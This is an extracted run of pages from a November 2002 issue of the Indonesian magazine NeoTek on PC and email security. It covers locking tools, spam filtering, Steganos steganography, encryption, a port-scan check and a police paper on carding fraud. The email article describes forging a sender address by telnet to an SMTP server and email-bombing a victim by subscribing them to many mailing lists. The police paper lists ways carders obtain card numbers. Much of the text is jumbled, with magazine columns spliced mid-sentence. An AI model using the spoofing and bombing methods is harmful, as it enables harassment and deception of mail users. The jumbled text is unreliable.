pilih tab “Security.” controls and plug-ins.” ‘Prompt’ pada semua scripting. Te-
tapi yang terbaik adalah dengan
mengunjungi situs yang dapat
dipercaya.

November 2002 NeoTek 9


NeoStart

Hot download Jaga Keamanan PC Anda dengan WinLock


WinLock dapat mengunci Windows dengan kata sandi.
WinLock dapat menonaktifkan hotkey pada Windows (se-
perti Ctrl-Alt-Del, Alt-Tab, Ctrl-Esc, dsb.), mengunci desk-
top, dan menyembunyikan tombol Start dan Switch bar.
Ini dapat mencegah orang lain mengakses file tertentu dan
menginstal atau menghapus program. WinLock juga dapat
menghilangkan antar-muka (interface) RUN dan perintah
DOS sehingga orang lain hanya dapat mengakses apa yang
tersedia di menu Start. WinLock digunakan bersama dengan
identitas pengguna sehingga komputer anda bisa berlaku
seperti beberapa mesin. Utilitas ini bahkan dapat memba-
tasi waktu penggunaan sebuah komputer dan mencatat
Untuk mengatasi kekurangan dalam hal keamanan suatu aktivitas.
pada program-programnya, Microsoft menyediakan Jika anda menyetel Bios hanya untuk Hard Disk Boot dan
Product Updates. Anda dapat men-download menonaktifkan AutoRun, hanya ada dua cara drastis untuk
updates produk-produk Microsoft itu di menghilangkannya. Program ini merupakan trialware un-
http://office.microsoft.com/ProductUpdates/default.aspx tuk 30 hari kemudian anda dapat mendaftar secara online.

Menyetel sistem log-in pengguna terpisah pada PC anda

PADA MULANYA FAMILY LOGON PRIMARY NETWORK LOGON


1 Klik kanan ikon Network Neigbor-
hood pada desktop dan pilih
2 Langkah selanjutnya adalah
memilih Microsoft Family Logon
3 Selanjutnya pilih opsi Family
Logon dari menu Primary Network
Properties. Klik tombol Add. Lalu dari daftar Microsoft lalu klik Logon lalu klik OK. Lakukan
pilih tab Client, kemudian Add tombol OK. Masukkan CD Reboot sebagaimana diminta.
lagi. Windows jika diminta.

MEMBUAT PILIHAN DAFTAR USERS NAMA PENGGUNA BARU


4 Kini pilih menu Start dan dari
sana pilih opsi Setting kemudian
5 Layar di atas akan muncul, me-
nampilkan semua nama orang
6 Tentukan nama dan kata sandi
(password) pengguna baru. Pilih
Control Panel. Klik ganda ikon yang dapat menggunakan kom- (tick) semua opsi pengguna dan
Users. puter anda. Klik tombol New User pilih ‘Create new items to save
untuk menambahkan seorang disk space’ yang akan memberi-
pengguna lain. kan awal yang lebih rapih.

10 NeoTek November 2002


NeoStart

Tujukan browser anda ke www.crystaloffice.com/wlinfo.html pengirimnya.


untuk rincian selanjutnya. 8. Jangan menggunakan alamat email utama (atau riil) anda
Memproteksi Screensaver pada Newsgroup atau profil Chat Room. Kedua tempat
ini pun merupakan salah satu sumber serangan spam.
Jika anda meninggalkan komputer tanpa penjagaan mung-
kin akan ada orang yang coba-coba mengintip dan dapat Menyetel Filter Spam di Outlook
menyebabkan kekacauan. Anda dapat menambahkan kata Anda dapat menyingkirkan 80 persen spam dengan
sandi pada Screensaver anda untuk menghindari hal ini. menghapus email dari layanan email gratis seperti
Memang hanya dibutuhkan satu kali reboot untuk mem- Hotmail, Yahoo! dan Bigfoot. Layanan email berbasis Web
bypass kata sandi ini, tetapi hanya anda yang tahu menge- ini merupakan sasaran yang mudah bagi spammer karena
nai hal ini. tidak diperlukan verifikasi untuk mendapatkan akun.
Hindari Spam dan Email Sampah Perhatikan header yang mengandung kata-kata SEX, FREE,
Informasi yang tidak dikehendaki juga dapat menimbulkan DETECTIVE, WON, MERCHANT dan DVD karena kata-
masalah. Yang paling umum adalah spam-email sampah kata itu merupakan salah satu ciri email spam. Anda dapat
yang tidak diinginkan. memfilter email yang mengandung kata-kata semacam itu
di Outlook. Tetapi kerugiannya adalah Outllook juga
1. Jangan menjawab spam, karena alamat email anda akan mungkin akan membuang email mengandung kata seperti
terdaftar pada lebih banyak lagi penyebar spam karena Freedom atau Middlesex ke tempat sampah.
mereka tahu bahwa alamat itu dapat digunakan.
Oleh karena itu, untuk memastikan, sebelum mengosong-
2. Alih-alih memberi respons, sebaiknya anda melaporkan- kan “tempat sampah,” sebaiknya anda memeriksa ulang
nya ke sumber email asalnya. email-email yang telah disingkirkan di sana.
3. Jika anda ingin melaporkan spam, harap perhatikan
bahwa alamat jawabannya biasanya palsu. Pelajari Menghancurkan Cookies
header-nya dengan seksama. Informasi lain yang tidak diperlukan mungkin termasuk
4. Layanan sepeti www.spamCop.net dapat menangani cookies yaitu preferensi berselancar dalam ukuran kecil
spam. Anda bisa memperoleh layanan versi gratisannya, yang disimpan oleh suatu situs untuk anda. Cookies yang
tetapi sebaiknya mempertimbangkan untuk berlang- baik membantu anda mengingatkan preferensi log-in anda,
ganan jika memang berhasil menghalau spam. tetapi ada pihak-pihak tertentu yang menggunakan cookies
untuk mengumpulkan data mengenai anda untuk tujuan
5. Jika mendapat email pemberitahuan mengenai virus, komersial. Anda dengan demikian bisa menjadi sasaran
anda harus menceknya pada sumber yang benar untuk iklan tertentu. Ada orang yang tidak menyukai perilaku
memastikan kebenarannya. http://ciac.llnl.gov/ciac/ cookies semacam ini.
CIACHoaxes.html dan http://www.datafellows.com/
news/hoax.htm adalah referensi yang baik. Juga, setiap kali anda mengunjungi sebuah situs, satu
salinan cookie disimpan secara lokal di hard disk pada
6. Mengirimkan email pemberitahuan mengenai virus cache. Lalu jika anda suatu kali mengunjunginya kembali,
hanya akan menambahkan kekacauan email. halaman situs akan lebih cepat tampil dari hard disk anda.
7. Jika mengirim attachment, anda dapat mengkonfirmasi- Data semacam ini dapat bertambah terus dan dapat
kannya lewat email tersendiri atau menggunakan header dimanfaatkan untuk tujuan tertentu. Untuk menangkis
pesan berkode sehingga penerima yakin bahwa andalah cookies anda dapat menggunakan utilitas dan salah satu
yang baik adalah 'Windows Washer' (www.webroot.com).

Cara menjaga privasi pesan email anda di Outlook Express

MEMBUAT KATA SANDI BERGANTI IDENTITAS MENGGANTI KATA SANDI


1 Pada Outlook Express, pilih menu
File → Identities → Add. Ketikkan
2 Kini setiap kali pengguna log on,
ia harus menggunakan identitas-
3 Pengguna dapat mengganti kata
sandi (password) mereka secara
nama identitas yang baru dan nya sendiri yang dapat mereka pribadi dengan cara memilih
buat kata sandi sehingga email temukan dengan mengklik menu Manage Identities → Properties.
anda menjadi bersifat pribadi. File dan memilih opsi Identities. Tetapi sebelum itu, mereka perlu
Windows meng-encode email memasukkan kata sandi yang
anda untuk setiap profil. lama.

November 2002 NeoTek 11


NeoStart

DE NGAN STEGANOS
ungkin anda perlu berpikir dua
M kali jika menganggap file-file
yang anda simpan di PC anda
aman dari incaran orang lain. Karena
PC AN DA AMAN & UTU H pada kenyataannya memang tidak
demikian. Orang dengan mudah dapat
membuka folder-folder file anda.
Kini agar anda dapat meninggalkan PC
dengan rasa aman, ada Steganos yang
dapat membantu anda membuat ‘Secure
Steganos II Security Suite dilengkapi dengan berbagai program Space’ di PC anda yang hanya dapat di-
akses oleh anda. Selain itu, masih banyak
pengaman berkomputer yang benar-benar berguna. Steganos akan kegunaan Steganos yang lain. Program
membantu anda menata file-file anda dan menjaganya agar tetap ini dapat anda instal CD NeoTek bulan
ini, tetapi anda perlu mendapatkan serial
aman dari incaran pihak lain. Berikut uraian cara menggunakan number-nya dari www.centurionsoft.com/
Steganos langkah demi langkah yang mudah diikuti. steganos2/general.html.

Apa saja yang ada di Membuat komputer anda lebih aman


Steganos II?
Inilah beberapa fungsi Steganos
yang tentunya amat bermanfaat
dalam kaitannya dengan ke-
amanan dalam berkomputer:
The Steganos Safe
The Steganos Safe berperilaku se-
perti sebuah disk drive normal.
Artinya anda dapat menyimpan
(save) file dari aplikasi apa saja
atau dari Internet langsung ke
Steganos Safe. Dengan hanya
sekali menekan tombol, drive itu
akan menghilang. Sesederhana LAYAR AWAL ANTAR MUKA STEGANOS
itu! Semua data yang disimpan
di Steganos Safe dienkripsi de-
1 Saat membuka Steganos un-
tuk pertama kali, anda akan
2 Interface Steganos dibagi dua:
bagian atas, Steganos Explorer,
disuguhkan layar di atas. Klik memungkinkan anda mem-
ngan menggunakan algoritma tombol ‘OK’ untuk membuka browse hard disk anda. Bagian
(128 bit). Hanya dengan mema- Steganos Explorer. bawah berisi Secure Space
sukkan kata sandi yang benar untuk menyimpan file. Klik
anda dapat memperoleh kembali ikon Hide/Encrypt di sini.
akses ke data anda.
Pengelolaan kata sandi
Simpan semua kata sandi, PIN
dan kode akses di satu tempat
dan anda hanya perlu mengingat
satu kata sandi. Ada juga fasilitas
untuk ‘secara diam-diam’
bersepakat mengenai kata sandi
dengan rekan bisnis dan teman.
System Lock
Jika anda meninggalkan kompu-
ter anda, Steganos memungkin-
kan anda mengunci (lock) kom-
puter anda dengan menggunakan MEM-BROWSE FILE KOMPONEN STEGANOS
kombinasi tombol tertentu. Sete- 3 Cara kerja Steganos Explorer
mirip dengan Windows Ex-
4 Pada kolom kiri anda dapat
menjumpai ikon komponen-
lah anda memasukkan kata sandi, plorer. Anda dapat mengklik komponen Steganos, seperti
Steganos SysLock akan membuka tombol navigasi untuk berpin- Steganos Safe, Steganos
kembali komputer anda untuk dah-pindah folder. Anda juga Shredder, Steganos SysLock
digunakan kembali. dapat mengubah layout Ex- dan Zero Emission Pad.
plorer lewat salah satu ikon.

12 NeoTek November 2002


NeoStart

Steganos memungkinkan anda menyembunyikan dan mengenkripsi file anda sehingga aman

MENYALIN FILE PEMINDAHAN YANG AMAN HIDE AND ENCRYPT


5 Untuk meng-copy file ke ‘Se-
cure Space,’ ada dua cara:
6 Anda juga dapat memindah-
kan file dari tempatnya ke
7 Setelah menyalin file ke Secure
Space di bagian bawah layar,
menggeret dan men-drop tempat yang aman melalui anda dapat menyembunyikan-
folder bersangkutan atau menu ‘Move to Secure Space.’ nya. Pilihan ‘Hide and Encrypt’
memilih file-nya dan mengklik tentunya akan lebih aman
‘Copy to Secure Space.’ dibandingkan ‘Encrypt Only.’

MEMBUAT CARRIER FILE MEREKAM CARRIER FILE MASUKKAN KATA SANDI


8 Kini anda perlu membuat se-
buah file yang bertindak seba-
9 Klik Record untu mulai mere-
kam .wav file yang akan men-
10 Sebelum mengakhiri proses
ini, anda harus memasukkan
gai ‘carrier’—tempat untuk me- jadi carrier file. Klik ‘Save and password untuk memproteksi
nyembunyikan file. Klik ikon Exit,’ lalu browse hard disk carrier itu. Makin panjang kata
kaca pembesar, lalu pilih untuk menyimpannya di suatu sandi anda, makin aman pula
‘Create a new carrier file.’ Pada tempat. Setelah ini, anda siap file itu. Selanjutnya klik OK.
layar berikutnya, pilih Audio untuk melakukan enkripsi.
File.

CLOSE AND SECURE CARRIER FILE MEN-DECRYPT FILE


11 Kini selesai sudah proses en-
kripsi. Untuk merampungkan
12 Kini jika ada yang melihat file
carrier itu di folder tempat
13 Untuk melihat file anda, klik
ikon Unhide/Decrypt pada
proses, klik ‘Close and Secure’ anda menyimpannya, file itu Steganos Explorer. Lalu browse
pada kolom kanan halaman akan berlaku sebagai file hard drive anda sampai pada
utama. Ini akan men-save file musik. Jika diklik ganda, file file yang dikehendaki. Setelah
anda menjadi file lagu yang itu akan berperilaku seperti mendapatkannya anda harus
kita buat sebelumnya. halnya file .wav. memasukkan kata sandi un-
tuk memunculkan filenya.

November 2002 NeoTek 13


NeoStart

Email Sebagai Senjata


Dari Email Kaleng Sampai Spam
Email sudah menjadi piranti komunikasi yang paling diandalkan dalam dunia modern, baik untuk keperluan
pribadi maupun bisnis. Namun sifat email yang memanfaatkan penghantar elektronik menyimpan potensi
bahaya penyalahgunaan yang bukan saja menjengkelkan tetapi juga dapat bersifat fatal.

AHWA VIRUS DAN WORM SERING DIKIRIM melalui

B attachment email, sudah banyak diketahui orang.


Setelah Nimda, sekarang ada worm Klez sampai
sekarang masih saja berkeliaran, membuatnya
menjadi worm yang paling sulit dibasmi. Untunglah
antivirus yang ada memberi juga perlindungan dengan
jalan men-scan email yang diterima (dan juga dikirim
terhadap kemungkinan adanya virus). Bahkan servis web
email gratis Yahoo! Memberikan juga pelayanan scan
terhadap virus.
Namun selain sebagai media penyebaran virus dan worm,
email itu sendiri dapat dijadikan senjata dalam perang di
dunia cyber.

Surat Kaleng di Internet


Dengan pos biasa setiap orang bisa mengirim surat tanpa
alamat si pengirim (surat kaleng); tapi bagaimana dengan
email? Apakah bisa kita mengirim ‘email kaleng’?
Anda dapat mengirim anonymous email dengan software
seperti Private Idaho dengan menggunakan fasilitas
remailer yang ada pada software ini. Private Idaho dapat
di-download di http://www.lynagh.demon.co.uk/pidaho
dan untuk menjalankannya diperlukan VBRun300.dll di
C:\Windows\System. Download VBRun300.dll di sini:
http://www.bodgers.clara.net/vbrun.htm
Gambar di samping menunjukkan cara Private Idaho be-
kerja, yaitu mengirimkan email anda ke tujuan melewati
beberapa kali remailer yang akan mengirimkan anonym-
ous email dari satu remailer ke yang lain sebelum email
itu sampai di tujuan.

Email dengan Alamat Pengirim Palsu


Mengirim email kaleng artinya email tanpa alamat pe-
ngirim, tapi bagaimana dengan alamat palsu? Dalam pos
• Private Idaho memanfaatkan remailer secara berantai untuk
menyembungikan identitas pengirim email.

14 NeoTek November 2002


NeoStart

biasa kita tinggal me-


nulis saja alamat palsu
dan memposkannya.
Pada email sebenarnya
juga hampir semudah
itu, yaitu dengan meng-

• Mendaftarkan email korban pada banyak mailing list adalah salah


satu teknik untuk mengirim email bomb.

pilih File > Properties lalu pilih tab Detail serta tombol
Message Source. Bandingkan isi From: dengan X-Sender.
• Mengakses SMTP server melalui telnet. Selanjutnya dalam komunikasi Bila berbeda, maka paling tidak anda tahu siapa pengirim
dengan server anda dapat mengirim email dengan header yang diubah sebenarnya. X-Sender berasal dari mail server pengirim
sesuai keinginan anda. dan lebih sukar dimanipulasi.

Email Bomb
akses SMTP server kita dengan telnet dan sewaktu komu-
nikasi dengan SMTP server kita tinggal ketikkan saja email Email dapat digunakan untuk melumpuhkan komputer
address kita (sebagai pengirim) sesuka-suka kita. yang terhubung ke Internet, bahkan seluruh jaringan
komputer perusahaan dapat dilumpuhkan dengan email
Fasilitas telnet terdapat pada setiap mesin Windows dengan
bomb. Untuk melakukan hal ini jumlah email dan ukur-
menjalankan Start > Run lalu ketikkan telnet. Akan tampil
annya harus cukup besar untuk melumpuhkan sasarannya.
jendela Telnet. Pilih menu Connect > Remote System dan
masukkan SMTP mail anda pada Host Name dan anda Metode email bomb yang sederhana adalah dengan me-
akan mengakses server ini melalui fasilitas Telnet. Akses ngirimkan sejumlah besar email ke alamat email korban.
telnet ke server SMTP biasanya hanya disediakan apabila Jumlah email yang dikirim tidak harus ribuan atau lebih;
anda sebagai pelangan ISP tersebut sudah logon ke langsung dapat juga lebih sedikit, asalkan isinya besar, misalnya
ke server-nya melalui fasilitas dial up. dengan memberikan attachment berupa file yang besar.
Bagaimana anda melindungi diri dari kebohongan email Email pribadi dapat saja menjadi serangan email bomb.
palsu ini? Bila anda merasa curiga terhadap email terten- Sebagai contoh bila seseorang mengirimkan anda email
tu, anda harus melihat header-nya. Sayangnya hampir dengan ukuran attachment 10 Mbyte satu saja setiap
semua mailer secara default menyembunyikan data ini. hari, akan membuat mailbox anda penuh dan membuat
email dari pihak lain ditolak oleh mail server anda.
Pada Outlook Express anda dapat melihat rincian header
email yang anda curigai dengan memilih email itu, lalu Lebih parah lagi kalau anda sebagai korban dibuat ber-
langganan pada sejumlah besar mailing list. Daftar mail-
• Dengan Email
Remover anda dapat
memeriksa email
melalui header-nya
dulu, dan email dapat
dihapus tanpa harus
men-download-nya.

• Apabila From: berbeda dengan X-Sender, maka palimng tidak anda


tahu siapa pengitrim email yang sebenarnya.

November 2002 NeoTek 15


NeoStart

ing list dari segala macam jenis dapat dilihat di sini: Untuk memudahkan pengertian, bayangkan bahwa public
http://www.listsareus.com/ key adalah gembok sedangkan private key adalah anak
Untuk melindungi komputer anda dari email bomb, anda kuncinya. Pemilik anak kunci mengirim gembok pada
dapat menggunakan Email Remover, yang dapat di- rekanannya dan meminta agar pesan yang dikirim digem-
download di http://eremover.bizhosting.com/ bok dulu sebelum dikirim. Pesan itu aman dalam perjalanan
sebab pesan yang sudah digembok tidak bisa dibuka sebab
Dengan Email Remover anda tidak perlu men-download kunci untuk membukanya hanya ada di pihak penerima
keseluruhan email, melainkan cukup header-nya saja. pesan (yang juga pengirim gembok tadi).
Dengan daftar email dan ukurannya anda dapat memper-
kirakan email mana yang tidak anda inginkan dan lang- Proses enkripsi asimetrik yang paling terkenal adalah RSA
sung anda hapus di sini. (dari nama penciptanya Rivest, Shamir, dan Adleman). RSA
menggunakan proses matematis yang lebih kompleks diban-
dingkan dengan DES. Hal ini membuatnya memerlukan
Enkripsi Email waktu lebih lama untuk membentuk enkripsi yang lebih
Kerahasiaan email anda terancam bukan oleh para hacker aman. Anda harus memilih antara keamanan dan efisiensi.
ataupun agen-agen rahasia, melainkan para system ad-
ministrator sendiri. Para system administrator kadang- Personal Encryption
kadang bosan tidak tahu apa yang harus dikerjakan selain Kriptografi yang mudah digunakan namun tangguh baru
membaca-baca email orang. Mereka dapat melakukannya ada semenjak Phil Zimmerman memperkenalkan pro-
tanpa sedikit pun meninggalkan jejak. gramnya PGP (Pretty Good Privacy) pada tahun 1991. PGP
memanfaatkan public key cryptography untuk enkripsi dan
Symmetric Encryption digital signing terhadap file-file umum seperti email. PGP
Cara mengatasi hal ini adalah dengan mengenkripsi email dengan cepat menjadi standar de facto untuk personal cryp-
anda. Ada dua macam enkripsi, Symmetric Encryption dan tography, walaupun PGP masih merupakan produk yang
Asymmetric Encryption. Pada symmetric encryption, pe- dibatasi ekspornya oleh pemerintah AS, sehingga Zim-
ngirim dan penerima menggunakan kunci yang sama (si- merman bolak-balik diperiksa oleh pejabat bea cukai AS
metrik). Yang menjadi masalah adalah bahwa kunci ini selama tiga tahun.
harus dikirim pada penerima agar dapat membuka file yang PGP adalah sistem enkripsi hybrid, yang memanfaatkan
dienkripsi tadi. Kunci ini harus dikirim lewat jalur yang baik public key maupun algoritma enkripsi konvensional.
aman, baik lewat telepon, disket, atau format penyimpan Untuk meng-enkrip suatu pesan, suatu kunci rahasia
data lainnya. Dan tentunya jangan dikirin lewat pos biasa. diciptakan dan digunakan untuk mengenkripsi pesan itu.
Standar yang terkenal dalam hal symmetric encryption ini Kunci ini kemudian dienkripsi dengan public key dari
adalah DES (Data Encryption Standard) yang dikembang- penerima pesan dan di-attach bersama pesan yang dien-
kan oleh IBM dan NSA (National Security Agency) pada kripsi tadi.
awal tahun 70-an. Sekarang ini DES digunakan dalam banyak PGP juga digunakan sebagai digital signature yang me-
sistem di Internet seperti secure web protocol (HTTPS) dan mastikan bahwa suatu pesan memang pesan asli dari
SSL selain juga pada home banking standard (HBCI). Salah pengirimnya.
satu variasi DES adalah Triple DES (3DES) yang mempro-
ses tiga proses sehingga mencapai panjang kunci total 192 bit. PGP dapat diperoleh bebas untuk pemakaian pribadi dan
bentuknya yang paling populer adalah seri v2.6.x meng-
Asymmetric Encryption gunakan algoritma IDEA (lisensi gratis untuk pemakaian
pribadi pada PGP) untuk key encryption rahasianya dan
Untuk mengatasi masalah pengiriman kunci seperti yang algoritma RSA untuk bagian public key-nya.
terdapat pada symmetric encryptrion, dikembangkan
asymmetric encryption, yang di sini kedua belah pihak Steganografi
memegang satu dari pasangan kunci.
Berbeda dengan PGP yang mengenkripsi file menjadi teks
Personal key hanya untuk pemakaian sendiri dan harus acak, maka steganografi men-enkripsi teks dengan me-
tetap rahasia dan tidak diberikan pada orang lain. Kunci ini nyembunyikannya pada file gambar atau suara. Stegano-
dapat meng-enkrip dan men-dekrip pesan yang dienkripsi grafi adalah salah satu jenis enkripsi yang menggunakan
dengan public key. symmetric key.
Public key ditujukan un-
tuk didistribusikan pada
rekan komunikasi peme-
gang private key. Public
key akan digunakan un-
tuk mengirimkan pesan
terenkripsi yang hanya
dapat dibuka menggu-
nakan private key.

• Pemakaian enkripsi untuk


keperluan pribadi:
PGPFreeware yang
menggunakan kunci
asimetrik dan Steganografi
yang menggunakan kunci
simetrik.

16 NeoTek November 2002


NeoStart

Securit y Audit Sec ara Online dengan


Shields U P!! I P Agent
ACKING DAN KEAMANANNYA (se- Perhatikan, pada saat anda menjalankan
H curity) adalah ibarat dua buah
sisi mata uang logam yang nya-
program tersebut, dan kebetulan saat itu
PC anda terhubung ke Internet, maka
ris tidak bisa dipisahkan dari dunia kom- akan muncul pesan Multiple IPs, seperti
puter dan Internet. Bahkan ironisnya, tampak pada Gambar 1. Namun jika an-
sampai-sampai ada yang mengatakan da menjalankannya dalam status offline,
bahwa keduanya adalah merupakan dua maka pesan yang ditampilkan adalah ala-
sejoli, yang ditakdirkan untuk harus sa- mat IP local komputer anda (Gambar 2).
ling melengkapi dan saling mengisi agar
perkembangan teknologi jaringan kom-
puter, bisa tumbuh dan berkembang se-
cara transparan dan alami. • Gambar 4. Memeriksa alamat IP lokal.

Dengan alasan itulah mengapa kemudian puter anda, maka hasilnya kira-kira akan
muncul semacam anjuran pada kita semua, tampak seperti Gambar 4.
khususnya kepada para pemerhati dan • Gambar 1. Tampilan program IP Agent Jika sudah selesai, klik tombol Back un-
praktisi (pakar) Internet, agar seyogianya (Shields UP!!) dalam keadaan on-line tuk kembali ke tampilan semula, kemu-
memberikan porsi yang seimbang ketika dian klik alamat IP provider atau ISP anda.
membahas masalah hacking dan keaman- Pada tahap ini, program Shields UP!!
annya. Artinya, pada saat anda memba- akan memberikan dua pilihan: Test My
has masalah hacking, maka akan lebih Shields dan Probe My Ports (Gambar 5).
bijaksana jika informasi itu juga diimbangi
dengan memberikan tip atau solusi untuk
mengatasi dan mengantisipasi serangan
(gangguan) yang dilakukan para hacker. • Gambar 2. Tampilan program IP Agent
(Shields UP!!) dalam keadaan offline
Namun, sebagaimana kita ketahui, prak-
tek atau kenyataan di lapangan teryata
masih jauh dari apa yang diharapkan. Je- Pada Gambar 1, pesan Multiple IPs me-
las sekali terlihat derap langkah kedua- nyiratkan pada kita ada dua buah alamat
nya berjalan dengan tidak seirama. Se- IP yang bisa diperiksa: alamat IP lokal
bagai bukti, mungkin anda sendiri sudah komputer kita dan alamat IP yang dibe-
bisa melihat langsung bahwa di luar sana, rikan ISP, ketika kita melakukan dial-up.
baik di media cetak maupun elektronik, Jika anda sudah benar-benar siap, maka
mulailah dengan mengklik tombol Test • Gambar 5. Menu pilihan berikutnya.
masalah hacking-lah yang selalu menda-
pat prioritas utama pada setiap pemberi- My Shields pada posisi on-line, kemudi- Apabila dengan mengklik tombol Probe
taan (publikasi). Nah, atas dasar itu lah an tunggu sebentar hingga browser anda My Ports, dan program Shields Up tidak
saya mengangkat masalah security men- terbuka dan anda dibawa masuk ke Web menemukan sesuatu yang mencurigakan
jadi topik bahasan dalam artikel kali ini. server grc.com (Gambar 3). atau membahayakan pada salah satu pro-
Adapun utility yang akan kita manfaat- Setelah browser anda berhasil menam- tokol, maka seharusnya Shields Up anda
kan sebagai alat untuk memeriksa apakah pilkan ke dua buah alamat IP yang akan akan menuliskan pesan There is NO EVI-
komputer yang kita hubungkan ke In- diperiksa (Gambar 3), mulailah lakukan DENCE WHATSOEVER that a port (or even
ternet sudah benar-benar aman (secure) pemeriksaan dengan mengklik salah satu any computer) exists at this IP address!
atau tidak, adalah dengan menggunakan dari dua buah alamat IP tersebut. Seba-
IP Agent, atau yang oleh pembuatnya gai contoh, klik alamat IP lokal kom-
disebut Shields UP!!. Singkatnya, Shields
UP!! atau IP Agent adalah sebuah utility
yang berfungsi untuk menguji/meng-
analisa protokol-protokol Internet yang
sedang aktif ketika komputer melakukan
akses Internet. Jadi anda harus maklum
bahwa program atau utility Shields UP!!
hanya dikhususkan bagi user yang me-
miliki akses langsung ke Internet, baik
itu dari rumah atau Warnet. Jika anda
tertarik, dan ingin mencobanya langsung
di komputer anda, silakan download pro-
• Gambar 3. Tampilan situs Shields UP!!
gram tersebut di www.grc.com. • Gambar 6. Laporan hasil pemeriksaan.
untuk memulai pemeriksaan

November 2002 NeoTek 17


NeoTekno

Apa dan Bagaimana Carding


Penanganan Tindak Pidana
Cybercrime di Indonesia
Tindak pidana cybercrime cukup marak di Indonesia dan Kepolisian Republik Indonesia menyadari betul
kerusakan yang diakibatkan oleh tindak pidana yang bersifat borderless ini. Untuk sementara ini, perhatian
terutama diarahkan pada tindak pidana credit card fraud atau yang populer dengan istilah carding.
Artikel ini diangkat dari makalah Drs. Rusbagio Ishak (Kombes Pol/49120373), Kadit Serse Polda Jateng,
pada seminar tentang hacking yang diadakan NeoTek Agustus 2002 di Semarang.

NTERNET PADA DASARNYA DIGUNAKAN UNTUK me- Kasus dan Permasalahannya


I ningkatkan dan mempercepat proses serta mem-
perlebar jaringan bisnis, sebagai wahana ilmiah
Cybercrime adalah representasi dari kejahatan internasio-
nal yang menggunakan hitech karena cirri dan kejahatan
untuk mencari referensi ke berbagai perpustakaan di selu- yang paling menonjol adalah borderless atau tidak me-
ruh dunia. Namun orang Indonesia secara moral belum ngenal batas negara. Teknologi relatif tinggi artinya ha-
siap menghadapi teknologi baru ini. Mereka banyak nya orang-orang tertentu saja yang sanggup melakukan
menggunakannya hanya untuk chatting atau untuk ber- kejahatan ini serta open resources mediator atau dapat
komunikasi tanpa arah, saling membalas mengirim virus, menjadi media untuk berbagai kejahatan antara lain ke-
berjam-jam eksplorasi di situs (Web site) porno, sebagai jahatan di bidang perbankan, pasar modal, seks, pemba-
sarana berjudi sehingga terjadi pemborosan pulsa telepon, jakan hak-hak intelektual serta terorisme dan yang lebih
dana dan kerusakan moral. tepat lagi termasuk trans-national crime.
Cybercrime dasarnya adalah penyalahgunaan komputer
dengan cara hacking komputer ataupun dengan cara-cara Kasus Bermotif Ekonomi
lainnya merupakan kejahatan yang perlu ditangani dengan Data para cracker yang bermotifkan ekonomi atau senga-
serius, dan dalam mengantisipasi hal ini perlu rencana ja menipu berbelanja pada web site e-commerce dengan
persiapan yang baik sebelumnya. menggunakan nomor-nomor kartu kredit milik orang
Karena kejahatan ini potensial menimbulkan kerugian pa- lain, secara melawan hukum. Pelaku lazim disebut dengan
da beberapa bidang: politik, ekonomi, sosial budaya yang carder karena modus ini bukan cara hacking yang sesung-
siginifikan dan lebih memprihatinkan dibandingkan de- guhnya, sebagian tertangkap oleh penyelidik Reserse
ngan ledakan bom atau kejahatan yang berintensitas ting- Polda Jawa Tengah dan Polda DI Yogyakarta.
gi lainnya bahkan di masa akan datang dapat menggang-
gu perekonomian nasional melalui jaringan infrastruktur Kendala yang Dihadapi Penyidik
yang berbasis teknologi elektronik (perbankan, telekomu-
nikasi satelit, jaringan listrik, dan jaringan lalu lintas pe- Perangkat hukum yang memadai
nerbangan dsb.) Undang-undang atau perangkat hukum positif adalah ins-
Polri secara serius mengantisipasi cycbercrime dan trumen terakhir dalam menentukan berhasil atau tidak-
permasalahan lainnya yang berhubungan dengan nya suatu penyidikan karena penerapan delik-delik hu-
kejahatan internasional yang menggunakan hi-tech kum yang salah akan mementahkan penyidikan yang
karena kejahatan ini sangat intens, jangkauannya sangat dilakukan. Walaupun penyidiknya sudah mampu dan
luas serta pelaku rata-rata mempunyai intelektualitas memahami profil dan budaya para hacker/preker, teknik-
yang tinggi dan mempunyai komunitas tersendiri, serta teknik serta modus operandi para hacker/preker, serta su-
memerlukan penanganan secara komprehensif. dah didukung oleh laboratorium yang canggih sekalipun.

18 NeoTek November 2002


NeoTekno

Pengenalan Istilah (versi Polri) Modus Kejahatan Kartu Kredit (Carding)

Hacker adalah seseorang yang mampu dan dapat 1. Mendapatkan nomor kartu kredit (CC) dari tamu
memprogram jaringan serta mempelajari sistem hotel, khususnya orang asing.
jaringan, namun tidak merusak/mencuri data. 2. Mendapatkan nomor kartu kredit melalui kegiatan
Hacking adalah kegiatan yang dilakukan oleh chatting di Internet.
seseorang untuk mencari informasi melalui program 3. Melakukan pemesanan barang ke perusahaan di luar
yang ada dengan menggunakan komputer. negeri dengan menggunakan Jasa Internet.
Cracker adalah seseorang yang mampu dan dapat 4. Mengambil dan memanipulasi data di Internet
menembus suatu jaringan serta mencuri/merusak
jaringan tersebut. 5. Memberikan keterangan palsu, baik pada waktu
pemesanan maupun pada saat pengambilan barang di
Precker adalah seseorang yang mampu menembus Jasa Pengiriman (kantor pos, UPS, Fedex, DHL, TNT,
suatu jaringan dan memberitahukan kepada jaringan dlsb.).
tersebut tentang keadaan pengamanan jaringannya
yang dapat ditembus oleh orang lain.

Namun fakta-fakta yang ada menunjukkan bahwa hukum Strategi Penyidikan


selalu ketinggalan dengan teknologi sebagaimana dikata-
kan oleh Panji R. Hadinoto (2000), hukum sebagai produk Penyempurnaan perangkat hukum
perkembangan social budaya (termasuk teknologi) disadari Polri bekerja sama dengan para ahli hukum dan organisasi
mau tidak mau selalu tertinggal oleh technology driven lainnya yang sangat berkepentingan atau keamanan usa-
yang dominan. hanya tergantung dari kesempurnaan undang-undang di
bidang cyberspace (pengusaha e-commerce dan banking)
Kemampuan penyidik sedang memproses untuk merancangnya agar di Indonesi
Secara umum penguasaan operasional komputer dan pe- terwujud cyberlaw yang sempurna. Upaya tersebut secara
mahaman terhadap hacking komputer serta kemampuan garis besarnya adalah: menciptakan undang-undang yang
melakukan penyidikan terhadap kasus-kasus tersebut dari bersifat lex specialist, menyempurnakan undang-undang
para penyidik Polri masih sangat minim. Banyak faktor pendukungnya dan melakukan sintesa serta analogi yang
yang mempengaruhi hal tersebut namun dari beberapa lebih luas terhadap KUHP. Hal ini dilakukan dengan be-
faktor tersebut ada yang sangat berpengaruh (determinan). kerja sama dengan universitas-universitas yang ada di
Adapun faktor-faktor yang mempengaruhi adalah sebagai Indonesia dan instansi lainnya yang terkait (Telkom).
berikut:
Mendidik para penyidik
a. Kurangnya pengetahuan tentang komputer dan sebagi- Dalam hal menangani kasus cybercrime diperlukan pe-
